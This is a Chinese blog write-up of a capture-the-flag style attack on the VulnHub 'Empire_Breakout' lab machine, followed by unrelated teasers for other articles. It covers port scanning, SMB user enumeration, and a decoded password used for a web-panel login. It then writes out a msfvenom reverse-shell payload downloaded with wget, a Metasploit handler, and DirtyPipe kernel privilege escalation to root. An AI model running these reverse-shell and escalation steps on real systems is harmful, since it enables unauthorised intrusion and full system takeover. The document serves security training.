news 2026/6/25 12:39:59

Lingjing(灵境)+vulnhub:Empire_Breakout打靶记录

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Lingjing(灵境)+vulnhub:Empire_Breakout打靶记录

灵境平台项目地址

nullhttps://github.com/414aaj/LingJing

安装教程

(Lingling)灵境靶场安装及使用教程(windows和linux)-CSDN博客文章浏览阅读2.3k次,点赞28次,收藏23次。(Lingling)灵境靶场安装教程(windows和linux)_灵境靶场https://blog.csdn.net/2301_78519654/article/details/153920708?spm=1001.2014.3001.5502

测试环境

靶机描述见下方图片

靶机ip: 192.168.242.230

攻击机ip:192.168.188.146

开始

扫描ip

nmap -Pn -O -sV 192.168.242.230

发现80,139,445,10000,20000,端口

80端口网页检查源代码发现

<!-- don't worry no one will get here, it's safe to share with you my access. Its encrypted :) ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++. -->

在网上找个brainfuck在运行输出看到

.2uqPEfj3D<P'a-3

判断这可能是个密码,拿到10000,20000端口的web发现需要用户名,尝试常用的用户名均无果,

使用enum4linux工具枚举用户名

enum4linux 192.168.242.230

要输入密码的时候输入

.2uqPEfj3D<P'a-3

得到用户名cyber

使用用户名cyber密码.2uqPEfj3D<P'a-3去20000的web服务登陆

左下角有个模拟终端,可以直接执行命令,但是权限不是root所以需要进行提权,这里为了方便使用msf

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=攻击机ip LPORT=反弹端口 -f elf -o shell.elf

使用http服务传输shell.elf

python3 -m http.server 8888

在网页的虚拟终端执行

wget http://攻击机ip:端口/shell.elf chmod +x shell.elf

在攻击机开启监听

msfconsole use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST 192.168.188.146 set LPORT 3333 run #在web网页的终端执行 ./shell.elf

成功建立会话,现在开始提权,

background use post/multi/recon/local_exploit_suggester set SESSION 1 run

检测出来可利用的模块

# Name Potentially Vulnerable? Check Result - ---- ----------------------- ------------ 1 exploit/linux/local/cve_2022_0847_dirtypipe Yes The target appears to be vulnerable. Linux kernel version found: 5.10.0 2 exploit/linux/local/cve_2022_0995_watch_queue Yes The target appears to be vulnerable. Kernel version 5.10.0 appears to be vulnerable 3 exploit/linux/local/glibc_tunables_priv_esc Yes The target appears to be vulnerable. The glibc version (2.31-13+deb11u2) found on the target appears to be vulnerable 4 exploit/linux/local/netfilter_nft_set_elem_init_privesc Yes The target appears to be vulnerable. The kernel 5 appears to be vulnerable, but no offsets are available for this version 5 exploit/linux/local/netfilter_priv_esc_ipv4 Yes The target appears to be vulnerable. Target appears to be vulnerable 6 exploit/linux/local/su_login Yes The target appears to be vulnerable. Target appears to be vulnerable 7 exploit/linux/persistence/bash_profile Yes The service is running, but could not be validated. Bash profile exists and is writable: /home/cyber/.bashrc 8 exploit/linux/persistence/init_systemd Yes The target appears to be vulnerable. /tmp/ is writable and system is systemd based 9 exploit/multi/persistence/cron Yes The target appears to be vulnerable. Cron timing is valid, no cron.deny entries found

使用第一个模块cve_2022_0847

use exploit/linux/local/cve_2022_0847_dirtypipe set SESSION 1 set LHOST 192.168.188.146 set LPORT 7777 run

成功提权至root,两个flag分别在/home/cyber和/root

3mp!r3{You_Manage_To_Break_To_My_Secure_Access} 3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}

总结

这个机器网上说的是用普通用户目录下的tar去读取/var/backups/下的.old_pass.bak文件,读取出来的值是Ts&4&YurgtRX(=~h网上说可以用来登陆root用户,但是我尝试之后发现没有,于是使用msf扫描,最后提权的,有疑问的可以留言

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/25 12:38:24

Cat2Bug-Platform:把 BUG 管理做成轻量闭环,让中小团队测试协作更高效

一、总则&#xff1a;为什么中小团队更需要一套轻量 BUG 管理平台很多中小团队都遇到过同样的问题&#xff1a;缺陷散落在群聊、表格、邮件和口头沟通里&#xff1b;测试用例写在本地文件里&#xff0c;交付物版本对不上&#xff1b;修复进度靠反复追问&#xff0c;最后报告还得…

作者头像 李华
网站建设 2026/6/25 12:37:13

把 NES 模拟器搬到鸿蒙PC,再连个蓝牙手柄找回童年的感觉

最近晚上闲来无事&#xff0c;把手头的 MateBook Pro 翻出来折腾。HarmonyOS 的应用市场逛了一圈&#xff0c;没找到好用的 NES 模拟器。想连个蓝牙手柄找回童年的感觉。 为什么要干这事&#xff1f;事情是这样的&#xff0c;翻了翻应用市场&#xff0c;现成的 NES 模拟器不好用…

作者头像 李华
网站建设 2026/6/25 12:36:37

大模型入门必看:小白程序员轻松掌握Agent与AI核心技能(收藏版)

本文深入浅出地介绍了大模型的核心概念与技术&#xff0c;包括LLM的预训练、微调、幻觉现象&#xff0c;以及Agent的规划、记忆和工具调用能力。文章还详细解析了MCP协议、Token、RAG检索增强生成、记忆模块、Skill、ReAct反应机制等关键要素&#xff0c;并探讨了Agent的自我反…

作者头像 李华
网站建设 2026/6/25 12:33:21

有限元静力学计算验证-有理论计算结果对比——网格对弧形结构影响较大,矩形影响不大。——采用了一维线体梁单元-横截面矩形和圆形对比-三维计算结果对比-矩形表面和圆柱形表面!

网格对弧形结构影响较大,矩形影响不大 “悬臂问题描述:长为 2000 mm、横截面为 50 mm 的梁,在 100 N 作用下的最大挠度,材料默认为结构钢。” w计算的结果:横截面50*50mm,采用线体一维单元计算,2.5612mm,和chat计算结果一致。发现ds计算过程都会出错,ds专业性还是不够…

作者头像 李华
网站建设 2026/6/25 12:33:15

栖影 AI 落地实践:中小电商团队零代码搭建自动化视觉生产流水线

摘要 针对中小电商团队 AI 视觉生产门槛高、流程碎片化、输出标准不统一的普遍问题&#xff0c;本文提出一套零代码、低成本的自动化视觉生产流水线方案。方案基于多模态生成工具的参数复用、批量处理与跨模块联动能力&#xff0c;从模板标准化、批量生成、多平台适配、资产沉…

作者头像 李华
网站建设 2026/6/25 12:31:12

告别LLM能力边界!30分钟掌握AI Tools调用核心逻辑

作为开发者&#xff0c;你是否曾困惑&#xff1a; 为什么大模型能查股票价格、查天气&#xff1f; 一个只会“词语接龙”的概率模型&#xff0c;怎么突破虚拟限制调用外部工具&#xff1f; 明明训练数据里没有实时数据&#xff0c;却能返回精准的股票收盘价&#xff1f; 这篇文…

作者头像 李华